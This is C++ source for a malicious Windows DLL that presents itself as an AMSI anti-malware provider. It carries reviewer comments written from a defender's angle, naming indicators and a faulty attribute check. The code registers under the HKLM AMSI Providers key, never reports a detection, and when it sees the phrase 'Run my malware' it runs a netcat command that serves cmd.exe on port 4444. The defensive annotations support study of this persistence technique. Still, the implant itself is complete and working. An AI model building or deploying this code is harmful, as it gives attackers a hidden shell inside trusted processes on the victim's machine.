#include "stdafx.h" | |
#include <process.h> | |
using namespace Microsoft::WRL; | |
// Handle of this DLL, captured in DllMain on DLL_PROCESS_ATTACH and used by
// DllRegisterServer to resolve the DLL's own path for the InProcServer32 key.
// Value-initialised (null) until DllMain runs.
HMODULE g_currentModule{};
// DLL entry point for the in-proc COM server.
// On process attach it records the module handle and creates the WRL module;
// on process detach it terminates the WRL module. Other notifications are
// ignored (thread notifications are switched off on attach). `reserved` is
// not used. Always returns TRUE.
BOOL APIENTRY DllMain(HMODULE module, DWORD reason, LPVOID reserved)
{
    if (reason == DLL_PROCESS_ATTACH)
    {
        g_currentModule = module;
        // No per-thread work is needed, so opt out of thread attach/detach calls.
        DisableThreadLibraryCalls(module);
        Module<InProc>::GetModule().Create();
    }
    else if (reason == DLL_PROCESS_DETACH)
    {
        Module<InProc>::GetModule().Terminate();
    }
    return TRUE;
}
#pragma region COM server boilerplate | |
// COM asks whether the DLL may be unloaded. WRL's Terminate() reports whether
// no objects created by this module are still alive.
// Returns S_OK when unloading is safe, S_FALSE otherwise.
HRESULT WINAPI DllCanUnloadNow()
{
    const bool noLiveObjects = Module<InProc>::GetModule().Terminate();
    if (noLiveObjects)
    {
        return S_OK;
    }
    return S_FALSE;
}
// Standard COM class-factory lookup: delegated to the WRL module, which knows
// every class declared with CoCreatableClass in this DLL.
// Returns whatever Module::GetClassObject returns (S_OK with *ppv set, or a
// failure HRESULT such as CLASS_E_CLASSNOTAVAILABLE).
STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID FAR* ppv)
{
    auto& comModule = Module<InProc>::GetModule();
    return comModule.GetClassObject(rclsid, riid, ppv);
}
#pragma endregion | |
// AMSI provider implemented as a classic COM object (free-threaded marshalling
// via FtmBase). The CLSID below is the identity that DllRegisterServer writes
// under HKLM\Software\Classes\CLSID and HKLM\Software\Microsoft\AMSI\Providers.
class
DECLSPEC_UUID("2E5D8A62-77F9-4F7B-A90C-2744820139B2")
SampleAmsiProvider : public RuntimeClass<RuntimeClassFlags<ClassicCom>, IAntimalwareProvider, FtmBase>
{
public:
    // Called by AMSI with the content to scan; see the definition below.
    IFACEMETHOD(Scan)(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result) override;
    // Session teardown hook; this provider keeps no per-session state.
    IFACEMETHOD_(void, CloseSession)(_In_ ULONGLONG session) override;
    // Returns the human-readable provider name.
    IFACEMETHOD(DisplayName)(_Outptr_ LPWSTR* displayName) override;
private:
    // Not referenced by any method in this file.
    LONG m_requestNumber = 0;
};
// IAntimalwareProvider::Scan. Reads the buffer AMSI hands over, compares it
// against three fixed trigger phrases and, on a match, starts a thread running
// MyThreadFunction (defined later in this file). The verdict written to
// *result is always AMSI_RESULT_NOT_DETECTED, i.e. this provider never blocks
// anything.
//
// Review notes (defender's reading):
//  - A registered provider's Scan executes inside whichever process called
//    AMSI, so a thread or child process that originates here appears as
//    unexpected activity of that host process; that is the practical
//    detection point.
//  - A provider that never returns a detection result is itself inconsistent
//    with what an anti-malware provider is expected to do.
HRESULT SampleAmsiProvider::Scan(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result)
{
    // Resolve the Rtl string helpers from ntdll at call time. The function
    // pointer typedefs _RtlInitUnicodeString / _RtlEqualUnicodeString are not
    // in this file (presumably declared in stdafx.h). Neither the
    // GetModuleHandle nor the GetProcAddress result is checked for NULL.
    _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
    _RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
    // Trigger phrases: the bare phrase, and the same phrase wrapped in double
    // or single quotes.
    UNICODE_STRING myTriggerString1;
    RtlInitUnicodeString(&myTriggerString1, L"Run my malware");
    UNICODE_STRING myTriggerString2;
    RtlInitUnicodeString(&myTriggerString2, L"\"Run my malware\"");
    UNICODE_STRING myTriggerString3;
    RtlInitUnicodeString(&myTriggerString3, L"'Run my malware'");
    ULONG actualSize;
    ULONGLONG contentSize;
    // NOTE(review): with `&&`, a failed GetAttribute only returns early when
    // actualSize also happens to equal sizeof(ULONGLONG); otherwise execution
    // continues and contentSize is read below without having been written.
    if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_SIZE, sizeof(ULONGLONG), reinterpret_cast<PBYTE>(&contentSize), &actualSize)) &&
        actualSize == sizeof(ULONGLONG))
    {
        *result = AMSI_RESULT_NOT_DETECTED;
        return S_OK;
    }
    PBYTE contentAddress;
    // Same condition shape as above; contentAddress may likewise be left unset.
    if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_ADDRESS, sizeof(PBYTE), reinterpret_cast<PBYTE>(&contentAddress), &actualSize)) &&
        actualSize == sizeof(PBYTE))
    {
        *result = AMSI_RESULT_NOT_DETECTED;
        return S_OK;
    }
    if (contentAddress)
    {
        // Only short buffers (fewer than 50 bytes) are compared at all.
        if (contentSize < 50)
        {
            // Wrap the raw AMSI buffer as a UNICODE_STRING without copying.
            // UNICODE_STRING.Length is a byte count, as is contentSize.
            UNICODE_STRING myuni;
            myuni.Buffer = (PWSTR)contentAddress;
            myuni.Length = (USHORT)contentSize;
            myuni.MaximumLength = (USHORT)contentSize;
            // Third argument TRUE = case-insensitive comparison.
            if (RtlEqualUnicodeString(&myTriggerString1, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString2, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString3, &myuni, TRUE))
            {
                DWORD thId;
                // MyThreadFunction is defined after this function; a prior
                // declaration must come from elsewhere (presumably stdafx.h).
                // The returned thread HANDLE is discarded and never closed.
                CreateThread(NULL, 0, MyThreadFunction, NULL, 0, &thId);
            }
        }
    }
    // Unconditional verdict: nothing is ever reported as detected.
    *result = AMSI_RESULT_NOT_DETECTED;
    return S_OK;
}
// IAntimalwareProvider::CloseSession. This provider tracks nothing per
// session, so there is nothing to release; the session id is ignored.
void SampleAmsiProvider::CloseSession(_In_ ULONGLONG session)
{
    (void)session;
}
// IAntimalwareProvider::DisplayName. Hands out a pointer to a fixed,
// statically stored name; the caller receives no ownership and must not
// write through or free the pointer. Always returns S_OK.
HRESULT SampleAmsiProvider::DisplayName(_Outptr_ LPWSTR *displayName)
{
    static constexpr wchar_t kProviderName[] = L"Sample AMSI Provider";
    // The interface takes a non-const LPWSTR; the storage itself is read-only.
    *displayName = const_cast<LPWSTR>(kProviderName);
    return S_OK;
}
// Registers SampleAmsiProvider with the WRL module so that DllGetClassObject
// can hand out its class factory.
CoCreatableClass(SampleAmsiProvider);
// Thread body started from Scan when a trigger phrase is seen. system() passes
// the command line to the command interpreter, so from the host process the
// chain is host -> cmd.exe -> the listed binary. The return value of system()
// is discarded and lpParam is unused. For a defender, the hard-coded path,
// address and port are the static indicators, and an AMSI host process
// spawning cmd.exe is the behavioural one.
DWORD WINAPI MyThreadFunction(LPVOID lpParam)
{
    system("c:\\Temp\\nc64.exe 127.0.0.1 4444 -e cmd.exe");
    return 0;
}
#pragma region Install / uninstall | |
// Writes a REG_SZ value `valueName` (nullptr = default value) under
// key\subkey. The byte count handed to the registry includes the
// terminating NUL. Returns the Win32 status converted to an HRESULT.
HRESULT SetKeyStringValue(_In_ HKEY key, _In_opt_ PCWSTR subkey, _In_opt_ PCWSTR valueName, _In_ PCWSTR stringValue)
{
    const DWORD byteCount = static_cast<DWORD>((wcslen(stringValue) + 1) * sizeof(wchar_t));
    const LONG status = RegSetKeyValue(key, subkey, valueName, REG_SZ, stringValue, byteCount);
    return HRESULT_FROM_WIN32(status);
}
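// Self-registration entry point (e.g. via regsvr32). Writes:
//   HKLM\Software\Classes\CLSID\{clsid}                 default = "SampleAmsiProvider"
//   HKLM\Software\Classes\CLSID\{clsid}\InProcServer32  default = this DLL's path,
//                                                       ThreadingModel = "Both"
//   HKLM\Software\Microsoft\AMSI\Providers\{clsid}      default = "SampleAmsiProvider"
// The last key is what causes AMSI to load this DLL, so changes under
// HKLM\Software\Microsoft\AMSI\Providers are worth auditing on any host: a new
// entry there means a new DLL loaded into AMSI-enabled processes. Writing to
// HKLM requires an elevated caller.
// Returns S_OK; E_UNEXPECTED when the module path or CLSID string cannot be
// obtained; otherwise the HRESULT of the first failing string or registry
// operation.
STDAPI DllRegisterServer()
{
    wchar_t modulePath[MAX_PATH];
    // GetModuleFileName returns 0 on failure and the buffer size when the path
    // was truncated; in both cases modulePath is unusable, so reject both.
    const DWORD pathLength = GetModuleFileName(g_currentModule, modulePath, ARRAYSIZE(modulePath));
    if (pathLength == 0 || pathLength >= ARRAYSIZE(modulePath))
    {
        return E_UNEXPECTED;
    }
    wchar_t clsidString[40];
    if (StringFromGUID2(__uuidof(SampleAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
    {
        return E_UNEXPECTED;
    }
    wchar_t keyPath[200];
    // Formats "<format with %ls>" with the CLSID string into keyPath; every
    // call reuses the same buffer.
    auto formatKeyPath = [&](PCWSTR format) -> HRESULT {
        return StringCchPrintf(keyPath, ARRAYSIZE(keyPath), format, clsidString);
    };
    // COM server registration.
    HRESULT hr = formatKeyPath(L"Software\\Classes\\CLSID\\%ls");
    if (FAILED(hr)) return hr;
    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"SampleAmsiProvider");
    if (FAILED(hr)) return hr;
    hr = formatKeyPath(L"Software\\Classes\\CLSID\\%ls\\InProcServer32");
    if (FAILED(hr)) return hr;
    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, modulePath);
    if (FAILED(hr)) return hr;
    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, L"ThreadingModel", L"Both");
    if (FAILED(hr)) return hr;
    // Register this CLSID as an anti-malware provider.
    hr = formatKeyPath(L"Software\\Microsoft\\AMSI\\Providers\\%ls");
    if (FAILED(hr)) return hr;
    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"SampleAmsiProvider");
    if (FAILED(hr)) return hr;
    return S_OK;
}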
// Self-unregistration entry point. Deletes the AMSI provider key first and
// then the COM CLSID key, both under HKLM; a key that is already absent
// (ERROR_PATH_NOT_FOUND) counts as success.
// Returns S_OK; E_UNEXPECTED when the CLSID string cannot be obtained;
// otherwise the HRESULT of the first failing string or registry operation.
STDAPI DllUnregisterServer()
{
    wchar_t clsidString[40];
    if (StringFromGUID2(__uuidof(SampleAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
    {
        return E_UNEXPECTED;
    }
    // Removes the whole subtree at `path`; "already gone" is not an error.
    auto deleteTree = [](PCWSTR path) -> HRESULT {
        const LONG status = RegDeleteTree(HKEY_LOCAL_MACHINE, path);
        if (status == NO_ERROR || status == ERROR_PATH_NOT_FOUND)
        {
            return S_OK;
        }
        return HRESULT_FROM_WIN32(status);
    };
    wchar_t keyPath[200];
    // Unregister this CLSID as an anti-malware provider.
    HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Microsoft\\AMSI\\Providers\\%ls", clsidString);
    if (FAILED(hr)) return hr;
    hr = deleteTree(keyPath);
    if (FAILED(hr)) return hr;
    // Unregister this CLSID as a COM server.
    hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls", clsidString);
    if (FAILED(hr)) return hr;
    return deleteTree(keyPath);
}
#pragma endregion |